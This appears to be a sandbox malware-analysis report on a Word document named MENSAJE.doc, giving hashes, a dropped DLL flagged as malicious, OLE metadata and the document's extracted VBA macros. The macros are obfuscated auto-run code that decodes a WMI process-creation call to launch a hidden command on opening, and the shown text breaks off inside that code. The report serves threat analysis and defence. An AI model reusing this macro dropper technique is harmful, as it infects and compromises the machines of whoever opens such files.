SHA-512:	5AA3D344F90844D83477E94E0D0E0F3C96324D8C255C643D1A67FA2BB9EEBDF4F6A7447918F371844FCEDFCD6BBAAA4868FC022FDB666E62EB2D1BAB9028919C
Malicious:	false
Preview:	.user..................................................A.l.b.u.s.............p.........w...............w.............P.w..............w.....z.........w.....x...

C:\Users\user\Liq8l58\Egok7ei\D64O.dll Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	354648
Entropy (8bit):	4.290297401493491
Encrypted:	false
SSDEEP:	3072:G82jpiC2JG7HZb7XWQml/jz8A4diTE90Q6kF4CKAYRkcj:V2L7HN7Kl/jLA90QECrYRpj
MD5:	2F6D3710BC30929A6715AD41166D74EF
SHA1:	39EA18E56A1C596FBD7569D858CCB525E4EE1817
SHA-256:	2BD8450DF65CDB30DFEA00F5DAA67E578E5D890C26EE7D692E5264F38650758C
SHA-512:	2B1BAB83437F3720FD298FEFA5FD26B5500B3ED32F70F89F5758054EF2C27BC49AE028FEE15A0878F7ECBAC961B7E05BA84E085DC1238F2BFBA9ABF77526DD75
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Metadefender, Detection: 46%, Browse Antivirus: ReversingLabs, Detection: 79%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.`...........!...2.@..........P........P...............................................................................`..d....................T..X............................................................a..`............................text....6.......8.................. ..`.rdata..W....P.......<..............@..@.data........`.......>..............@....text4.......p.......B..............@....text8..d............H.............. ..@.text7..d............J.............. ..@.text6..d............L.............. ..@.text5..d............N.............. ..@.reloc...............P..............@..B........................................................................................................................................................................................................................................................................

Static File Info

General
File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Subject: Outdoors, Outdoors & Shoes Personal Loan Account Unbranded one-to-one circuit Generic Fresh Tuna Money Market Account Compatible Roads, Author: Federico Briones, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Jan 22 19:01:00 2021, Last Saved Time/Date: Fri Jan 22 19:01:00 2021, Number of Pages: 1, Number of Words: 3199, Number of Characters: 18238, Security: 8
Entropy (8bit):	6.737500124615803
TrID:	Microsoft Word document (32009/1) 79.99% Generic OLE2 / Multistream Compound File (8008/1) 20.01%
File name:	MENSAJE.doc
File size:	170496
MD5:	cca3520e9a551b59637a6f7cecf4b39f
SHA1:	cbc4f477ab784d5b13f0f1bae27cd89e0b2ac10c
SHA256:	0965ec391a19f82dbbcc65557513a1b5a98d0fbec1c3a7f66aa6e32e667fb5a0
SHA512:	7a6603f1d4f29137c30387d6a0e09d58c04e1bd27064e538f922ed33ba064efa813da97009121e768fafdb3570490836df9efbd7dd98149f1cedbcfeb75b56f1
SSDEEP:	3072:0wT4Oqdduoxt7lrTdcrrXyQBsc0vWJVi4IrwVLYbdYPeFmfG5/+vG1Pt4kom3N7:0wT4Oqdduoxt7lWPIIU
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4eea2aaa4b4b4a4

Static OLE Info

General
Document Type:	OLE
Number of OLE Files:	1

OLE File "MENSAJE.doc"

Indicators
Has Summary Info:	True
Application Name:	Microsoft Office Word
Encrypted Document:	False
Contains Word Document Stream:	True
Contains Workbook/Book Stream:	False
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:
Flash Objects Count:
Contains VBA Macros:	True

Summary
Code Page:	1252
Title:
Subject:	Outdoors, Outdoors & Shoes Personal Loan Account Unbranded one-to-one circuit Generic Fresh Tuna Money Market Account Compatible Roads
Author:	Federico Briones
Keywords:
Comments:
Template:	Normal.dotm
Last Saved By:
Revion Number:	1
Total Edit Time:	0
Create Time:	2021-01-22 19:01:00
Last Saved Time:	2021-01-22 19:01:00
Number of Pages:	1
Number of Words:	3199
Number of Characters:	18238
Creating Application:	Microsoft Office Word
Security:	8

Document Summary
Document Code Page:	-535
Number of Lines:	151
Number of Paragraphs:	42
Thumbnail Scaling Desired:	False
Company:
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	917504

Streams with VBA

VBA File Name: Nre_13r__v1meabhr2, Stream Size: 1121

General
Stream Path:	Macros/VBA/Nre_13r__v1meabhr2
VBA File Name:	Nre_13r__v1meabhr2
Stream Size:	1121
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . u . . . . . . . . . . . , . . o . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 de 02 00 00 d4 00 00 00 da 01 00 00 ff ff ff ff e5 02 00 00 75 03 00 00 00 00 00 00 01 00 00 00 2c 1d 9a 6f 00 00 ff ff a3 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
False
Private
Attribute
VB_Creatable
VB_Name
Document_open()
VB_PredeclaredId
VB_GlobalNameSpace
VB_Base
VB_Customizable
VB_TemplateDerived
VB_Exposed

VBA Code

Attribute VB_Name = "Nre_13r__v1meabhr2"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Ljahi4yh66g9t6oax
End Sub

VBA File Name: Twwejh034u32ebq, Stream Size: 701

General
Stream Path:	Macros/VBA/Twwejh034u32ebq
VBA File Name:	Twwejh034u32ebq
Stream Size:	701
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . , . * . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 1c 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 23 02 00 00 83 02 00 00 00 00 00 00 01 00 00 00 2c 1d 2a b1 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
Attribute
VB_Name

VBA Code
`Attribute VB_Name = "Twwejh034u32ebq"`

VBA File Name: Uved9u320lyen, Stream Size: 25167

General
Stream Path:	Macros/VBA/Uved9u320lyen
VBA File Name:	Uved9u320lyen
Stream Size:	25167
Data ASCII:	. . . . . . . . . l . . . . . . . . . . . . . . . t . . . . H . . . . . . . . . . , . N . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	01 16 01 00 00 f0 00 00 00 6c 10 00 00 d4 00 00 00 b8 01 00 00 ff ff ff ff 74 10 00 00 e0 48 00 00 00 00 00 00 01 00 00 00 2c 1d 4e 92 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

VBA Code Keywords

Keyword
izsoCGvJ
paWrAs
(kVqKGDIMx
fDCQH
Until
xhCZAq
yXAkDJC
dAZzFm
XzAMGG
PmwneAAr.Range
ZQoRFxD.Range
fLrHD,
DjGAF(ruGLP)
gQeIGU
YOGNBFEJJ(JqRPV)
yteeIh()
UBound(FaeuQIDH)
dmUsACgD
tuwnUlI
yoTKwqIsG
onDpQWW()
UBound(ifLwTt)
RgCBRi
UBound(VHywBeoD)
foEzCEG
(mUryG
KLDUkJGJS
IJmiCJ:
xIuBj(oofPFJE)
MidB$(tYjkQO,
njcnja
pUQjDD
sHgJaG,
BwbBAFi(foEzCEG)
DkDVE()
(paWrAs
YOGNBFEJJ
SDiGFGB
VoGiD
UBound(sRKFiF)
FarLoFz
SXiaV
HPPUdFCC:
beDixHFI
KTfCJ,
gRutBJw
mhoxIuDG:
OkhnVlkx
zOxiWIIb
emKogsJt,
CxCcsO,
kvOjif,
rnekAzHd
xUDGCFC,
tYjkQO
bIhNCID
fQjtHB
KBiNIsVg:
AFprvHL(YuXlKu)
HPPUdFCC
FcSKHTIC
PgRZHO()
UODhfECCP.Range
bxlKBdJEV
sswIGoWgh.Range
MidB$(yteeIh,
kkPsepvID,
eJQhi
oofPFJE
bxlKBdJEV:
EJmBDY
xDvjIOBFP
CXFlxhCIJ,
dxmcNDC
qTPUJB
GHdxC,
cDhBGGFR
VHywBeoD
(iezxKGCjf
PSrcCvsEO
bHcuF
xIuBj()
OdqhFz
IXzyVV
moLoGCFdJ(fLrHD)
JqRPV,
CazGpHEDF.Range
(JqRPV
YOGNBFEJJ()
YAMzFD:
ruGLP
dIEzTDWJ.Range
QjrbGoAT
mUryG,
KiUcJFSiw
(bPtpAAz
WFlaEdEJF
ruGLP,
YAMzFD
ifLwTt(IQtMAu)
SJgnG
wjnsc
BwbBAFi()
fagdu
Qidjl:
MidB$(onDpQWW,
Qidjl
oNAXGHF
DjGAF
iezxKGCjf
(xUDGCFC
nnjasd,
Resume
IXzyVV,
ebgcAE
onDpQWW(VmouN)
(KTfCJ
oLCGmAiCG
yESSyEi.Range
dGuTI
EKKiJE.Range
nWxKMVOBG
EKKiJE
xDvjIOBFP:
BzqWhVTIQ
VHywBeoD(dkffwCHGW)
KBiNIsVg
PmwneAAr
UODhfECCP
iScJlw
aMdIG
hOyBkq
MidB$(PSrcCvsEO,
cDhBGGFR:
SJgnG,
mEsdJFB
jqLChB,
zUuWGbKHy
vQDCUDCB
MidB$(BwbBAFi,
LzBwHH:
MidB$(DkDVE,
gRLRHGC,
IJmiCJ
UBound(BwbBAFi)
BzqWhVTIQ,
UBound(PVoxdBG)
fLrHD
EQpkJ
gRutBJw,
MidB$(sRKFiF,
BukCBE
evivHCq
JWFlPMBdA
PVoxdBG(dxmcNDC)
(IQtMAu
afoME
YuXlKu
QkClFj
MidB$(ZrdKv,
sZNckH
UBound(moLoGCFdJ)
fufvMBxFB.Range
wyNRtEF
mhoxIuDG
(emKogsJt
QkClFj()
pXYQI
hpETwA
jOsZcJgCh
kkRMkYKwF:
yteeIh(bPtpAAz)
UBound(xIuBj)
lckOJI
CXFlxhCIJ
emKogsJt
GHdxC
bLGZEYcz,
kVqKGDIMx,
szzfJDSJ
(XzAMGG
PgRZHO
(fagdu
VHaeE
VB_Name
(dbkQgsAA
FYWwFXnmD
iXqMIB
QxJDiLDHH
MidB$(YOGNBFEJJ,
(dkffwCHGW
WUTQAet
SXiaV,
iDdzAA
limvmeCz
PLgbDBG
GTerTpDH
kwlTHAH,
EaHQHNPDJ
mUibp.Range
zAyhIWe:
PgRZHO(fagdu)
mwFcDF:
Mid(Application.Name,
VmouN
tYjkQO(CxCcsO)
UBound(YOGNBFEJJ)
MidB$(PgRZHO,
SbJQC
iNtVAIDc
dkffwCHGW,
dkffwCHGW
(jqLChB
VXGInFA()
jhPGFGFEE
RvUuQGH
PVoxdBG()
DmEHG
sRKFiF(oNAXGHF)
rnekAzHd:
IQtMAu
SEDgPAAd
MidB$(ifLwTt,
aMdIG.Range
VoGiD.Range
UBound(AFprvHL)
oNAXGHF,
MidB$(DjGAF,
DgoBQDE
dmUsACgD,
PSrcCvsEO()
VHywBeoD()
yESSyEi
DkDVE(dbkQgsAA)
OeKxDTJnB
UBound(VXGInFA)
moLoGCFdJ()
sRKFiF
HbTERWfG
dxmcNDC,
UBound(tYjkQO)
(IXzyVV
eUaictZE
tJnnSICuC
dIEzTDWJ
"sadsaccc"
"sasdsacc"
(gRutBJw
paWrAs,
StGIEBvBr
DObJX
(QfiVIAehH
(kvOjif
VXGInFA(emKogsJt)
gRLRHGC
UBound(DkDVE)
NmDEB
UBound(PSrcCvsEO)
(EJmBDY
PVoxdBG
SJlnAGABP
(ruGLP
ifLwTt()
(BzqWhVTIQ
UBound(QkClFj)
FYWwFXnmD.Range
zEMxFGC
zAyhIWe
zCOlH
yJLUe
fAEnDfCC
UBound(onDpQWW)
TORFFDHP
mUibp
sswIGoWgh
ELodJ
MidB$(FaeuQIDH,
Word.Paragraph
iezxKGCjf,
jqLChB
(CxCcsO
FaeuQIDH()
DaucBFEHV
bLGZEYcz
pcKfwB
LvygECNI
KTfCJ
DaucBFEHV.Range
RLhdX
ifLwTt
zQEvCNI
wjUEXtp
Content
tuwnUlI,
BukCBE(SJgnG)
UBound(DjGAF)
kkRMkYKwF
MidB$(AFprvHL,
BwbBAFi
kvOjif
CmglGAD
foEzCEG,
MidB$(xIuBj,
(oofPFJE
mwFcDF
ehgssJrG
PSrcCvsEO(bLGZEYcz)
RnNWIqm
sHgJaG
jfHHHlCG
UBound(yteeIh)
oofPFJE,
IQtMAu,
vIKvGtHY
hUYqA,
VXGInFA
(kwlTHAH
kkPsepvID
onDpQWW
oLvRsDgW
jfHHHlCG:
sRKFiF()
gNPBGhAIB
IBVrh
dbkQgsAA
MidB$(BukCBE,
FzldATHyG
woJbJABu
AFprvHL()
zMbQG
vQDCUDCB:
MidB$(moLoGCFdJ,
FaeuQIDH(sHgJaG)
FaeuQIDH
lPkcE
(SJgnG
EJmBDY,
oYpISX:
kUGXaZ
CxCcsO
UBound(PgRZHO)
QxJDiLDHH:
bSozuu
MidB$(VXGInFA,
JqRPV
(CXFlxhCIJ
Len(skuwd))
(oNAXGHF
ZQoRFxD
(foEzCEG
NmDEB:
(GHdxC
ZrdKv(SXiaV)
dbkQgsAA,
yteeIh
bPtpAAz
sCAOEB
QfiVIAehH
EaHQHNPDJ:
sZNckH:
(SXiaV
hOPLcHJ.Range
(dxmcNDC
(fLrHD
gQeIGU.Range
UBound(ZrdKv)
HbTERWfG.Range
ZrdKv()
SDQTYAih
nljDdEKC
bNIqI
VTAHFoBxb
(YuXlKu
xUDGCFC
CazGpHEDF
MidB$(QkClFj,
kVqKGDIMx
zsUxsFG
(bLGZEYcz
oYpISX
BukCBE()
Mid(skuwd,
DObJX.Range
KxJIEXq
KhPdASzO
nyozdGEMG
QkClFj(kwlTHAH)
(VmouN
UBound(BukCBE)
AFprvHL
hUYqA
MidB$(VHywBeoD,
zEMxFGC.Range
Error
DjGAF()
WhXxZBCFx
HrGdJP
pEAiGKqHg
Attribute
SuvbRJTD
CWWHXGG
yJLUe.Range
fufvMBxFB
(kkPsepvID
kwlTHAH
(dmUsACgD
VmouN,
LzBwHH
CNURGFVBp
hBXXCY
bSozuu.Range
(tuwnUlI
hOPLcHJ
Function
MidB$(PVoxdBG,
xIuBj
YuXlKu,
bPtpAAz,
tYjkQO()
ZrdKv
QfiVIAehH,
fagdu,
(gRLRHGC
moLoGCFdJ
YMyjEGOO
YwvvF
XgCNAOJ
DkDVE
nnjasd
mUryG
XzAMGG,
ArvQXC
rIkmCk
iqbgCC
(sHgJaG
BMCxVes
skuwd
(hUYqA

VBA Code

Attribute VB_Name = "Uved9u320lyen"
Function Ljahi4yh66g9t6oax()
   GoTo kkRMkYKwF
Set oLvRsDgW = QjrbGoAT
    Dim QfiVIAehH, SJgnG, pUQjDD As Long
    Dim DaucBFEHV As Word.Paragraph
    Dim BukCBE() As Byte
    For Each DaucBFEHV In Nre_13r__v1meabhr2.Paragraphs
        BukCBE = DaucBFEHV.Range
        dscc = "sadsaccc" & DaucBFEHV.Range
        SJgnG = UBound(BukCBE) - 1
        QfiVIAehH = 0
Set DgoBQDE = ArvQXC
        Do Until SJgnG > SJgnG
            If BukCBE(SJgnG) = 46 Or SJgnG = SJgnG Then
                dscc = "sasdsacc" & (QfiVIAehH / 2) + 1 & " to " & (SJgnG / 2) + 1 & MidB$(BukCBE, QfiVIAehH + 1, SJgnG - QfiVIAehH + 3)
                QfiVIAehH = SJgnG + 2
            End If
            SJgnG = SJgnG + 2
        Loop
    Next
kkRMkYKwF:
skuwd = Jy5bao1vbuy3ey + Nre_13r__v1meabhr2 . Content + C8lfxjyro41
   GoTo vQDCUDCB
Set RLhdX = GTerTpDH
    Dim gRutBJw, dbkQgsAA, CmglGAD As Long
    Dim EKKiJE As Word.Paragraph
    Dim DkDVE() As Byte
    For Each EKKiJE In Nre_13r__v1meabhr2.Paragraphs
        DkDVE = EKKiJE.Range
        dscc = "sadsaccc" & EKKiJE.Range
        dbkQgsAA = UBound(DkDVE) - 1
        gRutBJw = 0
Set rIkmCk = pcKfwB
        Do Until dbkQgsAA > dbkQgsAA
            If DkDVE(dbkQgsAA) = 46 Or dbkQgsAA = dbkQgsAA Then
                dscc = "sasdsacc" & (gRutBJw / 2) + 1 & " to " & (dbkQgsAA / 2) + 1 & MidB$(DkDVE, gRutBJw + 1, dbkQgsAA - gRutBJw + 3)
                gRutBJw = dbkQgsAA + 2
            End If
            dbkQgsAA = dbkQgsAA + 2
        Loop
    Next
vQDCUDCB:
wjnsc = "x [ sh bpx [ sh b"
Hq2nbtpkjzz = "x [ sh brox [ sh bx [ sh bcex [ sh bsx [ sh bsx [ sh bx [ sh b"
   GoTo rnekAzHd
Set eJQhi = iNtVAIDc
    Dim tuwnUlI, VmouN, dGuTI As Long
    Dim UODhfECCP As Word.Paragraph
    Dim onDpQWW() As Byte
    For Each UODhfECCP In Nre_13r__v1meabhr2.Paragraphs
        onDpQWW = UODhfECCP.Range
        dscc = "sadsaccc" & UODhfECCP.Range
        VmouN = UBound(onDpQWW) - 1
        tuwnUlI = 0
Set lckOJI = CNURGFVBp
        Do Until VmouN > VmouN
            If onDpQWW(VmouN) = 46 Or VmouN = VmouN Then
                dscc = "sasdsacc" & (tuwnUlI / 2) + 1 & " to " & (VmouN / 2) + 1 & MidB$(onDpQWW, tuwnUlI + 1, VmouN - tuwnUlI + 3)
                tuwnUlI = VmouN + 2
            End If
            VmouN = VmouN + 2
        Loop
    Next
rnekAzHd:
U29c1_kuq199izyc54 = "x [ sh b:wx [ sh bx [ sh binx [ sh b3x [ sh b2x [ sh b_x [ sh b"
   GoTo QxJDiLDHH
Set StGIEBvBr = bHcuF
    Dim dmUsACgD, fLrHD, jOsZcJgCh As Long
    Dim yJLUe As Word.Paragraph
    Dim moLoGCFdJ() As Byte
    For Each yJLUe In Nre_13r__v1meabhr2.Paragraphs
        moLoGCFdJ = yJLUe.Range
        dscc = "sadsaccc" & yJLUe.Range
        fLrHD = UBound(moLoGCFdJ) - 1
        dmUsACgD = 0
Set zQEvCNI = FzldATHyG
        Do Until fLrHD > fLrHD
            If moLoGCFdJ(fLrHD) = 46 Or fLrHD = fLrHD Then
                dscc = "sasdsacc" & (dmUsACgD / 2) + 1 & " to " & (fLrHD / 2) + 1 & MidB$(moLoGCFdJ, dmUsACgD + 1, fLrHD - dmUsACgD + 3)
                dmUsACgD = fLrHD + 2
            End If
            fLrHD = fLrHD + 2
        Loop
    Next
QxJDiLDHH:
Pmm9cm8qolvp = "wx [ sh binx [ sh bmx [ sh bgmx [ sh btx [ sh bx [ sh b"
   GoTo NmDEB
Set pEAiGKqHg = SJlnAGABP
    Dim IXzyVV, fagdu, ehgssJrG As Long
    Dim DObJX As Word.Paragraph
    Dim PgRZHO() As Byte
    For Each DObJX In Nre_13r__v1meabhr2.Paragraphs
        PgRZHO = DObJX.Range
        dscc = "sadsaccc" & DObJX.Range
        fagdu = UBound(PgRZHO) - 1
        IXzyVV = 0
Set IBVrh = OdqhFz
        Do Until fagdu > fagdu
            If PgRZHO(fagdu) = 46 Or fagdu = fagdu Then
                dscc = "sasdsacc" & (IXzyVV / 2) + 1 & " to " & (fagdu / 2) + 1 & MidB$(PgRZHO, IXzyVV + 1, fagdu - IXzyVV + 3)
                IXzyVV = fagdu + 2
            End If
            fagdu = fagdu + 2
        Loop
    Next
NmDEB:
K1dvo8hcenmvdt8 = "x [ sh bx [ sh b" + Mid(Application.Name, 60 / 10, 1) + "x [ sh bx [ sh b"
   GoTo Qidjl
Set ebgcAE = VTAHFoBxb
    Dim XzAMGG, sHgJaG, FarLoFz As Long
    Dim bSozuu As Word.Paragraph
    Dim FaeuQIDH() As Byte
    For Each bSozuu In Nre_13r__v1meabhr2.Paragraphs
        FaeuQIDH = bSozuu.Range
        dscc = "sadsaccc" & bSozuu.Range
        sHgJaG = UBound(FaeuQIDH) - 1
        XzAMGG = 0
Set woJbJABu = hpETwA
        Do Until sHgJaG > sHgJaG
            If FaeuQIDH(sHgJaG) = 46 Or sHgJaG = sHgJaG Then
                dscc = "sasdsacc" & (XzAMGG / 2) + 1 & " to " & (sHgJaG / 2) + 1 & MidB$(FaeuQIDH, XzAMGG + 1, sHgJaG - XzAMGG + 3)
                XzAMGG = sHgJaG + 2
            End If
            sHgJaG = sHgJaG + 2
        Loop
    Next
Qidjl:
Vbjlntbb7x3ac9o = Pmm9cm8qolvp + K1dvo8hcenmvdt8 + U29c1_kuq199izyc54 + wjnsc + Hq2nbtpkjzz
   GoTo bxlKBdJEV
Set tJnnSICuC = SDQTYAih
    Dim iezxKGCjf, oofPFJE, ELodJ As Long
    Dim CazGpHEDF As Word.Paragraph
    Dim xIuBj() As Byte
    For Each CazGpHEDF In Nre_13r__v1meabhr2.Paragraphs
        xIuBj = CazGpHEDF.Range
        dscc = "sadsaccc" & CazGpHEDF.Range
        oofPFJE = UBound(xIuBj) - 1
        iezxKGCjf = 0
Set KxJIEXq = jhPGFGFEE
        Do Until oofPFJE > oofPFJE
            If xIuBj(oofPFJE) = 46 Or oofPFJE = oofPFJE Then
                dscc = "sasdsacc" & (iezxKGCjf / 2) + 1 & " to " & (oofPFJE / 2) + 1 & MidB$(xIuBj, iezxKGCjf + 1, oofPFJE - iezxKGCjf + 3)
                iezxKGCjf = oofPFJE + 2
            End If
            oofPFJE = oofPFJE + 2
        Loop
    Next
bxlKBdJEV:
G_k1zbg91ofvz3bhf = Kfgztxaw46z(Vbjlntbb7x3ac9o)
   GoTo mwFcDF
Set qTPUJB = afoME
    Dim KTfCJ, kwlTHAH, dAZzFm As Long
    Dim hOPLcHJ As Word.Paragraph
    Dim QkClFj() As Byte
    For Each hOPLcHJ In Nre_13r__v1meabhr2.Paragraphs
        QkClFj = hOPLcHJ.Range
        dscc = "sadsaccc" & hOPLcHJ.Range
        kwlTHAH = UBound(QkClFj) - 1
        KTfCJ = 0
Set hOyBkq = fDCQH
        Do Until kwlTHAH > kwlTHAH
            If QkClFj(kwlTHAH) = 46 Or kwlTHAH = kwlTHAH Then
                dscc = "sasdsacc" & (KTfCJ / 2) + 1 & " to " & (kwlTHAH / 2) + 1 & MidB$(QkClFj, KTfCJ + 1, kwlTHAH - KTfCJ + 3)
                KTfCJ = kwlTHAH + 2
            End If
            kwlTHAH = kwlTHAH + 2
        Loop
    Next
mwFcDF:
Set Jfxhwoyn1nrrxfe = CreateObject(G_k1zbg91ofvz3bhf)
   GoTo oYpISX
Set PLgbDBG = izsoCGvJ
    Dim BzqWhVTIQ, bLGZEYcz, wyNRtEF As Long
    Dim sswIGoWgh As Word.Paragraph
    Dim PSrcCvsEO() As Byte
    For Each sswIGoWgh In Nre_13r__v1meabhr2.Paragraphs
        PSrcCvsEO = sswIGoWgh.Range
        dscc = "sadsaccc" & sswIGoWgh.Range
        bLGZEYcz = UBound(PSrcCvsEO) - 1
        BzqWhVTIQ = 0
Set lPkcE = KLDUkJGJS
        Do Until bLGZEYcz > bLGZEYcz
            If PSrcCvsEO(bLGZEYcz) = 46 Or bLGZEYcz = bLGZEYcz Then
                dscc = "sasdsacc" & (BzqWhVTIQ / 2) + 1 & " to " & (bLGZEYcz / 2) + 1 & MidB$(PSrcCvsEO, BzqWhVTIQ + 1, bLGZEYcz - BzqWhVTIQ + 3)
                BzqWhVTIQ = bLGZEYcz + 2
            End If
            bLGZEYcz = bLGZEYcz + 2
        Loop
    Next
oYpISX:
njcnja = Mid(skuwd, (1 + 1 + 1 + 1), Len(skuwd))
nnjasd = Kfgztxaw46z(njcnja)
   GoTo xDvjIOBFP
Set LvygECNI = SDiGFGB
    Dim kVqKGDIMx, SXiaV, yoTKwqIsG As Long
    Dim zEMxFGC As Word.Paragraph
    Dim ZrdKv() As Byte
    For Each zEMxFGC In Nre_13r__v1meabhr2.Paragraphs
        ZrdKv = zEMxFGC.Range
        dscc = "sadsaccc" & zEMxFGC.Range
        SXiaV = UBound(ZrdKv) - 1
        kVqKGDIMx = 0
Set SbJQC = OeKxDTJnB
        Do Until SXiaV > SXiaV
            If ZrdKv(SXiaV) = 46 Or SXiaV = SXiaV Then
                dscc = "sasdsacc" & (kVqKGDIMx / 2) + 1 & " to " & (SXiaV / 2) + 1 & MidB$(ZrdKv, kVqKGDIMx + 1, SXiaV - kVqKGDIMx + 3)
                kVqKGDIMx = SXiaV + 2
            End If
            SXiaV = SXiaV + 2
        Loop
    Next
xDvjIOBFP:
Jfxhwoyn1nrrxfe.Create nnjasd, O4diqcx_e7ge, Soumelol3sb_6v
   GoTo EaHQHNPDJ
Set vIKvGtHY = WFlaEdEJF
    Dim jqLChB, ruGLP, zsUxsFG As Long
    Dim PmwneAAr As Word.Paragraph
    Dim DjGAF() As Byte
    For Each PmwneAAr In Nre_13r__v1meabhr2.Paragraphs
        DjGAF = PmwneAAr.Range
        dscc = "sadsaccc" & PmwneAAr.Range
        ruGLP = UBound(DjGAF) - 1
        jqLChB = 0
Set iqbgCC = fAEnDfCC
        Do Until ruGLP > ruGLP
            If DjGAF(ruGLP) = 46 Or ruGLP = ruGLP Then
                dscc = "sasdsacc" & (jqLChB / 2) + 1 & " to " & (ruGLP / 2) + 1 & MidB$(DjGAF, jqLChB + 1, ruGLP - jqLChB + 3)
                jqLChB = ruGLP + 2
            End If
            ruGLP = ruGLP + 2
        Loop
    Next
EaHQHNPDJ:
End Function
Function Kfgztxaw46z(Os36vj0xgli8bd)
On Error Resume Next
   GoTo LzBwHH
Set KiUcJFSiw = TORFFDHP
    Dim CXFlxhCIJ, CxCcsO, SEDgPAAd As Long
    Dim mUibp As Word.Paragraph
    Dim tYjkQO() As Byte
    For Each mUibp In Nre_13r__v1meabhr2.Paragraphs
        tYjkQO = mUibp.Range
        dscc = "sadsaccc" & mUibp.Range
        CxCcsO = UBound(tYjkQO) - 1
        CXFlxhCIJ = 0
Set szzfJDSJ = iScJlw
        Do Until CxCcsO > CxCcsO
            If tYjkQO(CxCcsO) = 46 Or CxCcsO = CxCcsO Then
                dscc = "sasdsacc" & (CXFlxhCIJ / 2) + 1 & " to " & (CxCcsO / 2) + 1 & MidB$(tYjkQO, CXFlxhCIJ + 1, CxCcsO - CXFlxhCIJ + 3)
                CXFlxhCIJ = CxCcsO + 2
            End If
            CxCcsO = CxCcsO + 2
        Loop
    Next
LzBwHH:
Nz25rgs4jfp_k9_8y = Os36vj0xgli8bd
   GoTo HPPUdFCC
Set iDdzAA = bIhNCID
    Dim kvOjif, JqRPV, limvmeCz As Long
    Dim gQeIGU As Word.Paragraph
    Dim YOGNBFEJJ() As Byte
    For Each gQeIGU In Nre_13r__v1meabhr2.Paragraphs
        YOGNBFEJJ = gQeIGU.Range
        dscc = "sadsaccc" & gQeIGU.Range
        JqRPV = UBound(YOGNBFEJJ) - 1
        kvOjif = 0
Set zUuWGbKHy = CWWHXGG
        Do Until JqRPV > JqRPV
            If YOGNBFEJJ(JqRPV) = 46 Or JqRPV = JqRPV Then
                dscc = "sasdsacc" & (kvOjif / 2) + 1 & " to " & (JqRPV / 2) + 1 & MidB$(YOGNBFEJJ, kvOjif + 1, JqRPV - kvOjif + 3)
                kvOjif = JqRPV + 2
            End If
            JqRPV = JqRPV + 2
        Loop
    Next
HPPUdFCC:
Z_yrt0419vs56rm = T0ljxv29dexr3v2yt(Nz25rgs4jfp_k9_8y)
   GoTo cDhBGGFR
Set gNPBGhAIB = nyozdGEMG
    Dim gRLRHGC, dxmcNDC, bNIqI As Long
    Dim dIEzTDWJ As Word.Paragraph
    Dim PVoxdBG() As Byte
    For Each dIEzTDWJ In Nre_13r__v1meabhr2.Paragraphs
        PVoxdBG = dIEzTDWJ.Range
        dscc = "sadsaccc" & dIEzTDWJ.Range
        dxmcNDC = UBound(PVoxdBG) - 1
        gRLRHGC = 0
Set xhCZAq = zMbQG
        Do Until dxmcNDC > dxmcNDC
